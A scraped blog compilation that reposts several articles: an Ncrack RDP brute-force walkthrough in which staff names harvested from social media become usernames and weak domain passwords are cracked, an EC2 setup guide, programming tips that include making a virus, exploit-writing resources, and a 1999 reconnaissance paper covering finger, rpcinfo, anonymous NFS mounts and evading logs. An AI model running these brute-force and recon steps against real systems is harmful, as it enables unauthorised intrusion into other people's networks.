IT_Solution for Learning

Ncrack – Remote Desktop Brute Force Tutorial

2012-01-12T19:18:00.000-08:00

The Remote Desktop Protocol is often underestimated as a possible way to break into a system during a penetration test. Other services, such SSH and VNC are more likely to be targeted and exploited using a remote brute-force password guessing attack. For example, let’s suppose that we are in the middle of a penetration testing session at the “MEGACORP” offices and we already tried all the available remote attacks with no luck. We tried also to ARP poisoning the LAN looking to get user names and passwords, without succeeding. From a previus nmap scan log we found a few Windows machines with the RDP port open and we decided to investigate further this possibility. First of all we need some valid usernames in order to guess only the passwords rather than both. We found the names of the IT guys on varius social networking websites. Those are the key IT staff:

jessie taglejulio feaginshugh duchenedarmella martislakisha mcquainted restrepokelly missildine

Didn’t take long to create valid usernames following the common standard of using the first letter of the name and the entire surname.

jtaglejfeaginshduchenedmartislmcquaintrestrepokmissildine

Software required:Linux machine, preferably Ubuntu.nmap and terminal server client, sudo apt-get install tsclient nmap build-essential checkinstall libssl-dev libssh-devAbout NcrackNcrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. Security professionals also rely on Ncrack when auditing their clients. Ncrack’s features include a very flexible interface granting the user full control of network operations, allowing for very sophisticated bruteforcing attacks, timing templates for ease of use, runtime interaction similar to Nmap’s and many more. Protocols supported include RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, and telnet .http://nmap.org/ncrack/Installation

wget http://nmap.org/ncrack/dist/ncrack-0.4ALPHA.tar.gzmkdir /usr/local/share/ncracktar -xzf ncrack-0.4ALPHA.tar.gzcd ncrack-0.4ALPHA./configuremakecheckinstalldpkg -i ncrack_0.4ALPHA-1_i386.deb[/pre] Information gathering Let’s find out what hosts in a network are up, and save them to a text list. The regular expression will parse and extract only the ip addresses from the scan. Nmap ping scan, go no further than determining if host is online

nmap -sP 192.168.56.0/24 | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' > 192.168.56.0.txt

Nmap fast scan with input from list of hosts/networks

nmap -F -iL 192.168.56.0.txtStarting Nmap 5.21 ( http://nmap.org ) at 2011-04-10 13:15 CEST Nmap scan report for 192.168.56.10Host is up (0.0017s latency).Not shown: 91 closed portsPORT STATE SERVICE88/tcp open kerberos-sec135/tcp open msrpc139/tcp open netbios-ssn389/tcp open ldap445/tcp open microsoft-ds1025/tcp open NFS-or-IIS1026/tcp open LSA-or-nterm1028/tcp open unknown3389/tcp open ms-term-servMAC Address: 08:00:27:09:F5:22 (Cadmus Computer Systems) Nmap scan report for 192.168.56.101Host is up (0.014s latency).Not shown: 96 closed portsPORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds3389/tcp open ms-term-servMAC Address: 08:00:27:C1:5D:4E (Cadmus Computer Systems) Nmap done: 55 IP addresses (55 hosts up) scanned in 98.41 seconds

From the log we can see two machines with the microsoft terminal service port (3389) open, looking more in depth to the services available on the machine 192.168.56.10 we can assume that this machine might be the domain controller, and it’s worth tryingto pwn it.At this point we need to create a file (my.usr) with the probable usernames previously gathered.

vim my.usr jtaglejfeaginshduchenetrestrepokmissildine

We need also a file (my.pwd) for the password, you can look on the internet for common passwords and wordlists.

vim my.pwd somepasswordpassw0rdblahblah12345678iloveyoutrustno1

At this point we run Ncrack against the 192.168.56.10 machine.

ncrack -vv -U my.usr -P my.pwd 192.168.56.10:3389,CL=1 Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-10 17:24 CEST Discovered credentials on rdp://192.168.56.10:3389 'hduchene' 'passw0rd'rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.Discovered credentials on rdp://192.168.56.10:3389 'jfeagins' 'blahblah'rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.Discovered credentials on rdp://192.168.56.10:3389 'jtagle' '12345678'rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.Discovered credentials on rdp://192.168.56.10:3389 'kmissildine' 'iloveyou'rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.Discovered credentials on rdp://192.168.56.10:3389 'trestrepo' 'trustno1' rdp://192.168.56.10:3389 finished. Discovered credentials for rdp on 192.168.56.10 3389/tcp:192.168.56.10 3389/tcp rdp: 'hduchene' 'passw0rd'192.168.56.10 3389/tcp rdp: 'jfeagins' 'blahblah'192.168.56.10 3389/tcp rdp: 'jtagle' '12345678'192.168.56.10 3389/tcp rdp: 'kmissildine' 'iloveyou'192.168.56.10 3389/tcp rdp: 'trestrepo' 'trustno1' Ncrack done: 1 service scanned in 98.00 seconds.Probes sent: 51 | timed-out: 0 | prematurely-closed: 0 Ncrack finished.

We can see from the Ncrack results that all the user names gathered are valid, and also we were able to crack the login credential since they were using some weak passwords. Four of the IT staff have some kind of restrictions on the machine, except hduchene that might be the domain administrator, let’s find out.Run the terminal server client from the Linux boxtsclient 192.168.56.10 use Hugh Duchene credential ‘hduchene’ ‘passw0rd’ and BINGO !!!Final remarks.For the penetration testers: don’t give up at first hurdle, there’s always another way to break in :-) .For the IT staff: Lack of password policy enforcing complexity and strength lead to a disaster.reference:Here

Amazon Cloud EC2 Free VPS Setup

2011-11-04T20:56:00.000-07:00

First things first. When I say free I mean it’s free for a year. You will have to use the micro-instance, which is a 10gb HDD, 613mb ram and I quote

Up to 2 EC2 Compute Units (for short periodic bursts)

(Don’t ask me the mhz on that….) Its plenty fast enough for terminal use, VNC for a basic desktop, programming etc….You will need a credit card and a cell phone. A visa gift card and a prepaid phone will work.Lets sign up.The signup process is pretty straight forward. They will call your cell phone to have you put in a pin number. If you do this wrong to many times you will be blocked from signing up for 24 hours. Once the sign up process is complete sign in and click the EC2 tab.

You may get pop ups that ask if you want to stop a script, click no, the AWS console can be a bit slow in loading.Click ‘Launch Instance’

The instances with gold stars are the free micro tier instances and the ones you should pick unless you want to pay. You can also browse under ‘Community AMIs’ for other distributions. Lets pick the ‘Basic 32 bit Amazon Linux AMI’. Click Select.

You can only have 1 instance at a time for the free setup and it can only be a micro-instance. Click ‘Continue’.

Place a check in the ‘Termination Protection’. Terminating an instance deletes the instance completely. The protection basically stops you from accidentally deleting it. On the next screen name your instance and ‘Continue’

The ‘Key Pair’ is the only way you will be able to SSH into your instance at the start. You can change your sshd config later so you dont have to keep the key around. You cannot download this key again so make sure you save it somewhere safe on this screen. Create a new key pair and select ‘Continue’.

A ‘security group’ is essentially the firewall configuration. Choose the default one. It will already have the ports open for SSH.Your new instances is now running and you can connect to it. For SSH connection instructions right click on your instance and select ‘Connect’. Make sure to change the password when you connect for the first time.Notes:‘Elastic IPs’ on the left side of the console are essentially static IPs. I usually assign one to my instance so I dont have to remember the long hostname.Not all community AMI instances connect the same. Make sure to check the ‘Connect’ box for each instance for specific instructions.You can check for any charges to your card by clicking your name in the top right and select ‘Account Activity’Let me know if you have any trouble or need extra help.reference : http://www.get-root.com/?p=66

10 fun ways to program (for beginners)

2011-08-17T11:04:00.000-07:00

When most of us are just beginning to program we can become intimidated with language syntax and logic. It seems the only way to learn is paging through daunting 300 page books and trying to think of somehow applying this stuff in our own programs…
Well learning to program doesn’t have to be intimidating at all, it can be down right fun if you‘re truly passionate about the code you write. That’s exactly what this article’s here for, to give you ideas for great projects that will spark your passion and skyrocket your skills in the fastest time.

1. Don’t switch languages or learn two languages at once:
With so many programming languages out there and people raving as to which programming language is “best”, you might be tempted to change the one you’re studying every week or try to learn more than one at a time. Not only is this a bad idea but it can get boring fast! How fun can it be, never mastering a language and never creating programs like the one(s) in your dreams? Once you really start focusing on one language (though it may take months) you will come to a point were you have the capability to accomplish many programming tasks that you set your mind to; you will even understand the logic of programming and be able to apply it while learning another language. Just chillax and the skillz will come.

2. Have any hobbies other than programming?:
Perhaps you play chess, piano, or w/e. Creating programs that compliment your interest in other areas of life are a sure fire way to have fun programming and accelerate the learning processes. As an example lets say you’re really into piano, in order to play piano most people need sheet music. Instead of having to go out and search through the internet for sheet music and having to organize it in a folder maybe you can write a program to do it for you. It’s not as hard as it sounds, and if you’re interested, it’s that much easier due to your initial whole hearted approach.

3. Make a game:
This ones a given. You like games, they like games, hell even I like games. So why not make your own? You’ve probably had ideas for games but never the tools to bring these to fruition. Making a game is relatively easy across a broad spectrum of programming languages, many have their own game libraries (like pythons pygame module). My advice is start out simple because simple, elegant, games can be just as fun as any self respecting xbox360 game (chess for example). This area really allows you to stretch your creative muscles as well; although opinion may differ, programming is an art form and like any other requires a certain amount of creative thinking to be successful.

4. Make an IRC bot:
Definition (wiki): “An IRC bot is a set of scripts or an independent program that connects to Internet Relay Chat as a client, and so appears to other IRC users as another user. An IRC bot differs from a regular client in that instead of providing interactive access to IRC for a human user, it performs automated functions.”
Both making an IRC bot and spending time on IRC are great ways for a beginner to evolve as a programmer while having loads of fun. If you’ve never heard of IRC before, it’s basically a place (chat client/server model) where many people knowledgeable in computers/networking/security (and many other areas as well) like to hang out. By using IRC you’re exposing yourself to a plethora of expert knowledge.. Given that you try not to seem like an idiot of course. An IRC bot is like any other user of IRC except they’re not human. An IRC bot takes commands/conditions and responds accordingly; you’ve probably seen bots at work before, they’re the ones that automatically ban fruit hats who think spamming is cool.

5. Make it personal/make your life easier:
One of the easiest ways to ensure you remain interested and have fun in programming is by taking tedious tasks you perform often, and automating them. By doing this you are making your life easier and programming will undoubtedly earn your respect. Say for example you usually rename your downloaded files in a specified directory every other Wednesday according to a preferred system (perhaps a file like “epic movie.avi” will be renamed “epic_mov45.avi”). Usually this might take you anywhere from 10 to 30 minutes (or more) depending on how many files you’ve downloaded in the last two weeks, however after making a program to automate this task it will take less than a second!

6. Develop for other people:
Making programs for people other than yourself often rewards us with a sense of importance. Not only does it feel good to write software that other people use, you will gain many valuable programming related skills such as version control and writing program documentation. This is a great chance to get real world experience. Perhaps you can find a local non profit organization that would welcome programmers willing to work for no charge; maybe it would make your friends, family, or collogues lives easier if you automated a task for them. If you’re interested in working with other people, you might even want to check out preexisting open source projects. The experience will be rich and exciting, especially the first time you try it.

7. Have a robot do your math homework:
Okay maybe not a robot with moving arms, but you can still write programs that automate an extensive portion of the work you have to do assuming you’re a high school student. Teachers have a tendency to assign a crap load of homework and somehow retain the ability of teaching nothing at the same time. Obviously it would be beneficial for you to write programs that solve trivial homework stuff such as formulas so you can spend more time learning real math elsewhere.

8. Choose a fun programming language:
This one’s a little ticky; there’s no hard and fast rule as to which programming language is the most fun or even more fun than others. However there are certainly programming languages which are hardly fun at all! So in this case I will Simply list a few of the languages I’ve heard are pretty fun:

LUA
Python (I use this one myself)
C/C++
Perl
Before you begin learning a language seriously, it’s essential that you choose a language you’re going to enjoy for the long haul (because it could take months or years before you “really” learn it). This helps ensure that you remain interested and experience minimal frustration.

9. Make a virus:
Alright this one might be the reason you wanted to learn programming in the first place. Everyone has a bit of a dark side, and making a virus can be a really fun way of expressing it. If you choose to make a virus you should know that it’s illegal to test it on any system other than your own (using virtual machines are a great idea for this) and you really shouldn’t have any malicious intents either. Writing viruses are illustrative in the sense that you will closely be working with your targeted operating system and the system library for your language (many have one). I suggest that you don’t attempt this one if you’re not smart/stable enough to be responsible for your actions, otherwise you’re going to be sorry.

10. Project Euler:
Last but certainly not least is Project Euler! I personally find this to be one of the funniest ways to apply my programming skills above all else. Project Euler is a website that poses problems that you must solve using any programming language (or even paper and pencil if you’re up to it) and a bit of math know how. Project Euler can be frustrating at first (especially if you’re not a very experienced programmer or you lack in math ability) however if you press forward I can guarantee the rewards you earn will outweigh any and all frustration you come to face. After solving a respectable amount of problems (~25) you will probably be an exceptionally better programming (and even math). You don’t have to take my word for it though, check out http://projecteuler.net and remember to have fun :}

reference: http://packetfire.org/content/10-fun-ways-program-beginners

Exploit Writing

2011-07-18T18:40:00.000-07:00

Writing exploits is considered difficult and something that requires a great deal of effort. I had this similar notion in mind; which was unfortunately what people kept telling me. Things like you need to know how to code really well, u need to know in-depth assembly blah blah blah…Not very true..Read on…

How difficult is it ?
Well the basic prequisites would be to know a bit of coding, dont get scared just the basic stuff. Pick one of the scripting languages like Perl or Python coz they’r really easy. You need to get some understanding of x86 memory architecture: heap,stack,registers etc. Most exploits are targeted at Windows as most of the bugs that researchers find exist in Windows. So check out windows memory internals also. Having knowledge of assembly language is certainly a plus but you will pick it up IMO when you start writing exploits. Also ensure you have a proper understanding of Buffer Overflows in general. Read Smashing the Stack for Fun and Profit by Aleph One (http://www.phrack.com/issues.html?issue=49&id=14) which appeared in Phrack Magazine Issue 49, although old is still one of the best resources out there.

Why write exploits ?
You’r conducting a pen-test or you’r a security researcher and you need to reliably exploit a particular vulnerability you have found. Publically available exploits may not be properly coded. Most exploits for example use return addresses and these addresses differ from one OS/service pack to another. So you cant just fire away a public exploit and crash your client’s servers. Making your own exploit also means that you can embed your own choice of payload (Msfpayload in Metasploit helps here)

Lab requirements ?
Ideally my choice would be to have a Linux based machine such as Back-Track (attacker) with a text editor and ur language of choice installed. The victim machine (for remote exploits) can be a virtual machine running windows in VMware,VirtualBox etc. You may need to write local exploits on the victim machine so perl/python etc may have be installed there as well. You will also need Debuggers (Olly or Immunity dbg’s are the best) and the vulnerable software installed. Your final exploit is just basically a long string so once you become a pro all you really need is a text editor to make that string.

How to learn ?
There is a lot of stuff now on the Internet. It wasnt the case earlier but many researchers have published tutorials,videos etc on how to write reliable exploits using various techniques. One of the best places you can start is to look at corelanc0d3r’s blog on writing exploits : http://www.corelan.be:8800/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/It’s very detailed and presented really simple. Anybody can pick this up. But the important thing is you get your hands dirty by checking out all the stuff on your own. Another resource on the internet is the exploit writing class videos by Dino Dai Zovi :http://pentest.cryptocity.net/exploitation/ Dino is a well know researcher and his video is pretty basic and is a good place to start for beginners. There are also many videos avaliable on Securitytube : http://securitytube.net/ It’s a site started by Vivek Ramachandran and has loads of info on Assembly,buffer overflows primers etc and lots of other info-sec related topics. This by no means are the complete set of resources available on the internet. Google and you’ll find a ton of info on writing exploits.

What Courses ?
Offensive security’s OSCP course is really a great course but only covers a small portion on how to write exploits.
They do have advanced courses so check that out too: http://www.offensive-security.com/
What to read ?

Finally do some reading. The Shellcoder’s handbook is a really good book so check it out. Others include : Hacking – The Art of Exploitation, 2nd Edition ,The Art of Assembly Language by Randall Hyde, Fuzzing: Brute Force Vulnerability Discovery by Michael Sutton etc.

I hope this info has helped…if your a n00b at writing exploits this should help you fight your way to writing
exploits on your own. So all the best !

reference:http://psychsec.wordpress.com/2010/06/05/exploit-writing/

Strategic Scanning and Assessments of Remote Hosts (SSARH)

2011-06-22T21:18:00.000-07:00

Strategic Scanning and Assessments of Remote Hosts (SSARH)
Born on: 06.14.99
[Unix File]

INTRODUCTION:

This paper is being written for security administrators in hopes that they
will be able to notice security flaws in their networks and systems. Be it known that
this paper is NOT a hacking text and we will not go into the topic of compromise, but
this will show our target audience how to begin a strategic attack on a remote host.
We will cover basic assessment techniques involving open ports, RPC Services, open mount points,
and various ways to 'gain' information on your target before the actual attempt at compromise.

WHY:

I guess we need to get the obvious out of the way. Why attack a remote host is the first question you
should ask yourself (out of boredom is not a valid reason). I could probably go on and on about this but what
im trying to get you to ask yourself is 'IS IT WORTH COMPROMISING'? You need to look at the long term not the
short term affect. Gaining remote access to a government box or a 'high profile site' will carry some heavy penalties
if you are caught. So lets all think before we compromise.... ok? Be intelligent about your decisions please.
All examples given in this paper should be tested on a local network with permission from the powers that be.

BRIEFING:

Once you have found a remote host (target) that you would like to learn more about you are ready to move on.
Before we proceed with any technical information first let me define two types of attacks. A Passive attack is an
attack that does not 'touch' a targets network directly so you are not committed to follow through with the compromise
at that time. The next definition is the Active attack which does 'touch' the system and there is a very good
possibility that your tracks will be left in the logs therefore, you are then commited to following through with the
compromise to ensure that you are not found. Now lets move on to the more technical side of this file. First, I would
suggest checking out their webpage and snoop around to see if you can find any of the following:

1. Email addresses usually found at the bottom of a webpage as a contact.
2. Look for the 'OS' stamp on a webpage. Many admins/owners like to
display their love for their Operating System with little graphics such as 'Run on Linux',
'FreeBsd', 'Apache', 'IIS'..etc..etc
3. Does their website look 'professional'?
4. Do they provide any information about their network setup? (Yes, some are stupid enough
to provide network maps online.. duh!)
5. Do they provide an online X.500 query gateway online? This is where you can look up
email address's, phone numbers, and other various information about the users/employees of
the company, organization, and the server.
6. Do they provide an online telephone directory in which you type in
names of people and get phone numbers and locations (which is great for Social Engineering) or
visa-versa.
7. Anything else that would benefit in learning more about the remote host.

-Now that we have scanned over the web pages of a potential target we can then proceed
into the next phase of information gathering. Write down all of your notes on a piece of paper
or print them from file but I encourage you to never save these files to disk. If you do intend
to save these files to disk please make sure that you use the proper means to keep this
information secure (encryption). Now, lets take a look at the finger command.
The finger displays information about the system users. You can use this information for
login names for the system which is of great value when gathering information.
Here is an example of some output displayed when the finger command is envoked.

$ finger root@target.com (Active Attack)

[target.com]
Login Name TTY Idle When Where
root Super-User pts/0

$ finger -l root@target.com

[target.com]
Login name: root In real life: Super-User
Directory: / Shell: /bin/csh
Last login Mon Jul 19 13:42 on pts/0
No unread mail
No Plan.

-We see that including the '-l' flag will give us additional information about the users on
the target host.

-Now lets try placing a number before the '@' sign

$ finger 4@target.com

[target.com]
Login Name TTY Idle When Where
daemon ??? 04:51
bin ??? 05:45
sys ??? 08:54
RDoe ??? 04:34

$ finger -l 4@target.com

[target.com]
Login name: daemon
Directory: /
Never logged in.
No unread mail
No Plan.

Login name: bin
Directory: /usr/bin
Never logged in.
No unread mail
No Plan.

Login name: sys
Directory: /
Never logged in.
No unread mail
No Plan.

Login name: RDoe
Directory: /export/home/RDoe Shell: /bin/csh
Never logged in.
No unread mail
No Plan.

-Again, we see that adding the '-l' flag returns more data about the particular users of
the target host. Note that finger attempts may be logged in /var/log/messages (in Linux) and especially
if they have an IDS installed. A sample log would look similiar to the following:
Aug 2 05:21:25 erudite tcplog: finger connection attempt from 127.0.0.1
Also, finger runs on port 79/TCP and if the target host is not running the finger daemon then you will
not be able to use the finger query remotely to gather the information discussed above.

-We now have an easier account to compromise if we wish to do so. A users password will usually
be easier to compromise than a root password because many users do not know the importance of
an obscure password. The reason we obtain this information is because the finger command does
a pattern match on the number '4' and by process of elimination I would tend to guess that the
number '4' appears in the time field. You could also do the same thing with characters such as
the letter 'a' for example. So now that we have built up even more information about our target
host, lets dig deeper into the system and gather even more data.

-Next, lets look at the nslookup command and see if we can dig up even further information
on our target host. Nslookup is a program to query Internet domain name servers. Nslookup
has two modes: interactive and non-interactive. Interactive mode allows the user to query
name servers for information about various hosts and domains or to print a list of hosts in a
domain. Non-interactive mode is used to print just the name and requested information for a
host or domain. Here we will show examples of interactive and non-interactive modes.

$ nslookup target.com (Passive Attack)

Server: blah.yourhost.com
Address: 127.0.0.1

Non-authoritative answer:
Name: target.com
Address: 127.0.0.2

-In Non-interactive mode we simply do [nslookup [target host]] and are returned with the name
of the host and its designated IP address. The following is a demonstration of Interactive
mode and its associated flags.

A the host's Internet address.

CNAME the canonical name for an alias.

HINFO the host CPU and operating system type.

MINFO the mailbox or mail list information.

MX the mail exchanger.

NS the name server for the named zone.

PTR the host name if the query is an Internet ad-
dress; otherwise, the pointer to other infor-
mation.

SOA the domain's ``start-of-authority'' informa-
tion.

TXT the text information.

UINFO the user information.

WKS the supported well-known services.

-To execute nslookup in Interactive mode using the above flags, do the following:

1. Type the command nslookup

$ nslookup

Default Server: blah.yourhost.com
Address: 127.0.0.1

>

2. Set your flags by using [set type=[flag]]

> set type=mx [Here we are using the 'MX' flag or the 'Mail Exchanger' flag]
>

3. Type in the target hostname [i.e. target.com]

> target.com

Server: blah.yourhost.com
Address: 127.0.0.1

Non-authoritative answer:
target.com preference = 10, mail exchanger = mail.target.com

Authoritative answers can be found from:
target.com nameserver = ns1.upstream.com
target.com nameserver = ns2.upstream.com
mail.target.com internet address = 127.0.0.2
ns1.upstream.com internet address = 127.0.0.3
ns2.upstream.com internet address = 127.0.0.4

-Look at all this information we receive! We now know the nameserver this target uses, their
upstream provider, and the name of their mail server. As an exercise, try setting the type to
'any' by using the following syntax [set type=any]. See how much 'more' information you can
extract from each and every flag.

-We can now move on to the DiG command or Domain Information Groper. The DiG command is used similarly
to the nslookup command as both send domain name query packets to nameservers. Here we will show you an
example of simple interactive mode which may give you similar data that you had obtained using the nslookup
command, but DiG may return the slightly different data in a slightly different format. To use DiG, issue the
command as follows [dig [target.com]]:

$ dig target.com (Passive Attack)

; <<>> DiG 8.1 <<>> target.com
;; res options: init recurs defnam dnsrch
;; got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
;; QUERY SECTION:
;; target.com, type = A, class = IN

;; ANSWER SECTION:
target.com. 9h51m25s IN A 127.0.0.2

;; AUTHORITY SECTION:
target.com. 8h53m50s IN NS dns.upstream.com.
target.com. 8h53m50s IN NS www.upstream.com.

;; ADDITIONAL SECTION:
dns.upstream.com. 9h51m25s IN A 127.0.0.3
www.upstream.com. 9h51m25s IN A 127.0.0.60

;; Total query time: 37 msec
;; FROM: yourmachinename to SERVER: default -- 127.0.0.3
;; WHEN: Mon Aug 2 05:25:16 1999
;; MSG SIZE sent: 28 rcvd: 119

-The only new information we get is the web URL for the upstream provider of this particular target machine.
Also, if you look closer you will see that various times are reported also as is the indication that the target
is an internet domain class. I am partial to nslookup due to the functionality and ease of use.
[man dig for more options regarding the DiG command]

-We will now move on to the whois command which is the TCP/IP Internet user name directory service.
whois searches for an TCP/IP directory entry for an identifier. You can obtain a considerable amount of
information using this simple command. For this command, use the following syntax [whois [target host]]:

$ whois target.com (Passive Attack)

TARGET.COM (TARGET5-DOM)
0000 Junk Street
Lost Wages, WA 00000
US

Domain Name: TARGET.COM

Administrative Contact, Technical Contact, Zone Contact:
wah, chung (LC0000) somepoorsoul@TARGET.COM
000-000-0000 (FAX) private
Billing Contact:
wah, chung (LC0000) somepoorsoul@TARGET.COM
000-000-0000 (FAX) private

Record last updated on 12-Apr-99.
Record created on 12-Feb-99.
Database last updated on 2-Aug-99 04:09:46 EDT.

Domain servers in listed order:

DNS.UPSTREAM.COM 127.0.0.3
DNS2.UPSTREAM.COM 127.0.0.4

-We now have a technical contact with name, email address, phone number, and sometimes fax number when it is not
marked 'private'. The technical contact and number can be of great use when social engineering. Take this time
to put all of the information we have thus far on a sheet of paper and you will see that we know a lot about this
target host now, but in a few moments we will learn a great deal more as we now lead you into the rpcinfo command.

-The rpcinfo command reports RPC information on a particular host. rpcinfo makes an RPC call to an RPC server and
reports what it finds. Many RPC services are vulnerable to a number of different attacks. Take the ttdbserver exploit
for instance, due to a bug in the source we could write and manipulate any file on the server it is running on remotely
because this particular program is run as 'root'. If the portmapper is not running on the remote target host then we
should receive something along the lines of 'rpcinfo: can't contact portmapper: RPC: Remote system error - Connection refused'. The
reason we receive this error is because we are trying to get a listing of RPC services via the portmapper which isn't running
on this particular host. If we do successfully contact the portmapper we should get an output as follows. To use the
rpcinfo command we would use the following syntax [rpcinfo -p [target host]]:

$ rpcinfo -p www.target.com (Active Attack)

program vers proto port
100000 3 udp 111 portmapper
100000 2 udp 111 portmapper
100000 3 tcp 111 portmapper
100000 2 tcp 111 portmapper
100003 2 udp 2049 nfs
100003 3 udp 2049 nfs
100024 1 udp 808 status
100024 1 tcp 810 status
100021 1 udp 2049 nlockmgr
100021 3 udp 2049 nlockmgr
100021 4 udp 2049 nlockmgr
100021 1 tcp 2049 nlockmgr
100021 3 tcp 2049 nlockmgr
100021 4 tcp 2049 nlockmgr
100005 1 tcp 1058 mountd
100005 1 udp 1036 mountd
391004 1 tcp 1063
391004 1 udp 1037
100001 1 udp 1038 rstatd
100001 2 udp 1038 rstatd
100001 3 udp 1038 rstatd
100000 3 udp 111 portmapper
100000 2 udp 111 portmapper
100000 3 tcp 111 portmapper
100000 2 tcp 111 portmapper
100003 2 udp 2049 nfs
100003 3 udp 2049 nfs
100024 1 udp 808 status
100024 1 tcp 810 status
100021 1 udp 2049 nlockmgr
100021 3 udp 2049 nlockmgr
100021 4 udp 2049 nlockmgr
100021 1 tcp 2049 nlockmgr
100021 3 tcp 2049 nlockmgr
100021 4 tcp 2049 nlockmgr
100005 1 tcp 1058 mountd
100005 1 udp 1036 mountd
391004 1 tcp 1063
391004 1 udp 1037
100001 1 udp 1038 rstatd
100001 2 udp 1038 rstatd
100001 3 udp 1038 rstatd
391002 1 tcp 1070
100083 1 tcp 1073

-I won't go into all the technical details here, but the listing shown here would be a goldmine for any hacker.
We see above that program '100083' is running, but the service isn't listed. The ttdbserver runs as program
'100083' so we could have a vulnerable system on our hands. There are several other things to check here such as
nfs, nlock, mountd, and rstatd. We will not go into how to exploit these services, but we want to teach you how to
compile information on a remote target for a well-thought-out, calculated, time-sensitive audit.

-We will now move on to open mount points or better known as an exported list. Showmount shows mount information for
an NFS server. showmount queries the mount daemon on a remote host for information about the state of
the NFS server on that machine. If you do not include an option with the showmount command you will receive a list
of clients who are mounting from that host. We usually use the '-e' option which is the 'export option' and is a great
way to find 'anonymous' mounting permissions on remote hosts. To use the showmount command with the 'export option' use the
following syntax [showmount -e [target host]]. Note that if the mountd daemon is not listed in the RPC services we will not
be able to use showmount on that particular target host:

$ showmount -e www.target.com (Active Attack)

Export list for www.target.com:
/ (anonymous)

-As you can see that the root directory or '/' is allowed to be mounted by anybody with a connection to the internet and
a *NIX box. This is probably due to a misconfigured NFS server. All we would need to do is mount this system and we would
have full control to edit the /etc/passwd and /etc/shadow files not to mention any other file on this particular target
host. As an exercise, on your own system, try mounting an anonymous exported listing by using the following command:

$ mount -t nfs www.yourhost.com:/ /mnt

-This will give you full control over your own box anonymously. Now perform the command [cd /mnt] and you should be in
your boxs' root directory. Now perform the following command [ls -al]. If all went according to plan you should see a
listing of the files and directories in the root directory. There are several other tasks we could accomplish once inside
but, we will leave that up to the imagination of the reader.

-Now lets take a look at a traceroute to the target host. Traceroute prints the route packets take to a network host.
This will also alert us to any firewalls that stand in our way to the target host (usually indicated with a '*').
Note that the only mandatory parameter is the destination host name or IP number. The default probe datagram length
is 38 bytes, but this may be increased by specifying a packet size (in bytes) after the destination host name.
To initialize a traceroute use the following syntax as well as the man pages [traceroute [target host]]

$ traceroute www.target.com (Active Attack)

traceroute to www.target.com (127.0.0.2), 30 hops max, 40 byte packets
1 rsm1.yourhost.com (127.0.0.8) 0.791 ms 0.703 ms 0.704 ms
2 bigdog-gw.yourhost.com (127.0.0.9) 0.592 ms 0.551 ms 0.405 ms
3 1.atm8-0-0.umab-gw.net.ums.edu (131.118.255.129) 1.422 ms 1.020 ms 1.349
ms
4 206.181.226.97 (206.181.226.97) 51.923 ms 52.127 ms 69.832 ms
5 dca1-core3-h4-0.atlas.digex.net (165.117.51.70) 75.446 ms 66.744 ms 71.79
1 ms
6 dca1-core7-fa6-0-0.atlas.digex.net (165.117.16.7) 79.978 ms 79.756 ms 77.
974 ms
7 dca1-core9-pos1-1.atlas.digex.net (165.117.59.89) 69.804 ms 82.369 ms 81.
144 ms
8 atl1-core5-pos1-3.atlas.digex.net (165.117.51.145) 86.819 ms 78.657 ms 52
.745 ms
9 atl1-core3-pos4-0-0.atlas.digex.net (165.117.59.74) 40.033 ms 63.228 ms 6
8.938 ms
10 atl1-core1-fa3-0-0.atlas.digex.net (165.117.61.21) 78.620 ms 86.860 ms 98
.448 ms
11 500.Hssi11-1-0.GW1.ATL1.ALTER.NET (137.39.140.21) 105.357 ms 89.566 ms 11
6.460 ms
12 104.ATM3-0.XR2.ATL1.ALTER.NET (146.188.232.54) 121.399 ms 106.549 ms 139.
801 ms
13 294.ATM3-0.TR2.ATL1.ALTER.NET (146.188.232.110) 124.997 ms 129.528 ms 110
.989 ms
14 109.ATM6-0.TR2.LAX2.ALTER.NET (146.188.136.54) 201.188 ms 159.915 ms 215.
266 ms
15 198.ATM7-0.XR2.LAX2.ALTER.NET (146.188.248.133) 185.642 ms 142.192 ms 140
.496 ms
16 194.ATM9-0-0.GW1.PHX1.ALTER.NET (146.188.249.125) 158.889 ms 148.169 ms 1
37.867 ms
17 yourtargetsupstream-gw.customer.ALTER.NET (157.130.224.94) 153.436 ms 94.951 ms 140.0
85 ms
18 * * *
19 * * *

-As you can see from this traceroute data that we are looking at a box that resides somewhere in the Phoenix
Arizona area and most likely has some sort of packet filtering device before we reach our remote target indicated
by the '* * *'(hops 18 & 19). We also get information of what 'path' we take to get to our desired target host along with
the hop number for each path taken. Sometimes it may be easier to compromise an upstream and sniff the traffic to compromise
the target host. We can get away with a 'full' traceroute by using a technique known as 'Firewalking' (http://www.packetfactory.net/firewalk).
Firewalking is a technique developed by MDS and DHG that employs traceroute-like techniques to analyze IP packet responses to
determine gateway ACL filters and map networks. Firewalk the tool employs the technique to determine the filter rules
in place on a packet forwarding device. Also, we will be discussing spoofed packets to 'pierce' firewalls as a means to
portscan a machine on an internal network.

-For the remainder of this file we will be discussing portscanning. Portscanning has become one of the key auditing and
recon techniques amongst hackers today. There are a variety of portscanning utilities on the internet ranging from your
basic sequential portscanner to scanners that will bounce scans off of other hosts as an attempt to hide the origination of the scan.
The scanner that will be used in this file is a very versitile scanner called Nmap (http://www.insecure.org/nmap). Nmap is a utility
for network exploration or security auditing. It supports ping scanning (determine which hosts are up), many port scanning
techniques (determine what services the hosts are offering), and TCP/IP fingerprinting (remote host operating system
identification). Nmap also offers flexible target and port specification, decoy scanning, determination of TCP sequence
predictability characteristics, reverse-identd scanning, and more (try [man nmap] for more details). Lets take a look
at some of the flags we can use with Nmap along with the data that we obtain with each flag. First try just typing in the
command 'nmap' so you can see how to use the application.

nmap V. 2.12 usage: nmap [Scan Type(s)] [Options] [host or net #1 ... [#N]]

-Here we have version number of the program and its usage.

